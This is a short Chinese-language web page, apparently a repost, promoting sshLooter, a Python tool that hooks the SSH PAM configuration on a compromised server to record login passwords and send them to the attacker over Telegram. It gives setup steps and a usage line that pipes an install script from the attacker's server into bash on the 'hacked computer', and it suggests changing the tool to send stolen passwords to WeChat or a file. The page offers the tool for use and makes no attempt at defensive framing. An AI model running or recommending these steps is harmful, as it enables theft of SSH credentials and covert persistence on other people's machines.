sshLooter – SSH 密码记录工具

华盟学院山东省第二期线下学习计划

sshLooter – SSH 密码记录工具

sshLooter是一个Python脚本,它使用PAM模块通过记录密码来窃取SSH密码,并在用户登录时通过Telegram通知脚本管理员,而不是通过不太可靠的strace。

通过修改/etc/pam.d/sshd,达到记录ssh密码,由于他会把记录到的密码发送到telegram,针对某些目标不是很方便,可以修改sendMessage函数达到发送到微信或者记录到文件。

安装
git clone https://github.com/mthbernardes/sshLooter.gitcd sshLooter

组态
编辑install.sh上的脚本,并添加您的电报bot api和您的用户ID。在电报上打电话给@botfather创建一个机器人并调用@userinfobot来获取你的用户ID。

用法
在被黑的计算机上执行 curl http:// yourserverip:8000 / install.sh | bash在您的服务器上执行 python -m SimpleHTTPServer

www.idc126.com

下载地址:https://github.com/mthbernardes/sshLooter

0

发表评论